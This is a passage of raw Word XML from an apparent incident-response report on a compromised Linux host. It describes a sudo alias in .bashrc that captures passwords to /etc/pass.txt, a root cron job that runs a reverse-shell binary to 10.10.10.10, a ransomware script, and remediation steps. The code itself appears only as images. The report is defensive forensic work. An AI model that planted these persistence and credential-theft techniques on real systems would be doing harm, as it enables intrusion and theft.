              <w:t>bashrc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>, line 118</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="53326E92" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7DE14E93" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="47905F8D" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>The /home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bashrc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">contains a suspicious call to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>alias</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> that overrides the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> command, by calling the /home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/.locale</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08AE91B2" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>fsudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> command instead; by assessing the content of this file it was determined that it is a malicious script, created to obtain the user password for the user </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> by providing a fake prompt before each </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> execution, and saving the resulting input to the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>/pass.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C181B9A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33E7B6CB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>The following is the call to the alias command inside /home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bashrc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B5C4709" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="453A7A39" wp14:editId="6F6FC77A">
                  <wp:extent cx="4476750" cy="10414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4476750" cy="1041400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E1E146F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6302E34E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Content of /home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>/.locale</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fsudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00D70048" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2E4498C5" wp14:editId="18A58460">
                  <wp:extent cx="4476750" cy="10541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4476750" cy="1054100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50C8BB85" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af0"/>
        <w:tblW w:w="84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0"/>
        <w:gridCol w:w="7260"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="46253E0F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3FCEB283" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77A31338" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">crontab for user </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="353F98D4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1DCAA2E3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="01D7A55A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">By assessing the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>crontab -l</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> output for user </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, which lists all the recurrent tasks expected to be executed by the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">root </w:t>
            </w:r>
            <w:r>
              <w:t>user, it was possible to discover the malicious executable /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/bin/anew, which when executed opens a reverse shell for the remote IP 10.10.10.10, as shown in the following excerpt of the decompiled binary:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48EF1ABA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="20D4234E" wp14:editId="055B254E">
                  <wp:extent cx="2788131" cy="2780165"/>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2788131" cy="2780165"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E131C9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Since the following line was found in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">’s </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>crontab</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t>anew</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> executable has been running every day at 23:59 since November 18th.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63D6C851" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="41CFBA52" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="5E289EE7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="592BAF08" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BE6BE8A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>IT Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="63C2C12D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="5764FDFA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Vector:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5870358A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Remote, Local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="70381B60" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="4179D794" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A5028BF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">It is crucial to remove all the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>aforementioned instances</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> of malicious executables, scripts and pieces of code, and to conduct a thorough investigation in order to remove any additional leftover programs that the attacker(s) might have left behind to achieve present/future persistence on the compromised machine.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="337F129C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF9B155" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0214C860" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_heading=h.kfw7gnb4y0ix" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>Presence of Ransomware script– vese.com</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(High Severity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7257AAB7" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="5E238666" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="283D3641" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F572B43" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The malicious script /bin/disk_utils.py, with ransomware characteristics, has been found on the target. Additionally, a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>systemd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> service in charge of executing the ransomware script has been found.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="40163438" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="13E7E7D3" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="42B54B4A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="33427E61" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="2EDE161F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19036B92" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Host: vese.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="09A8B5F9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="18F72DE0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA7ADA9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
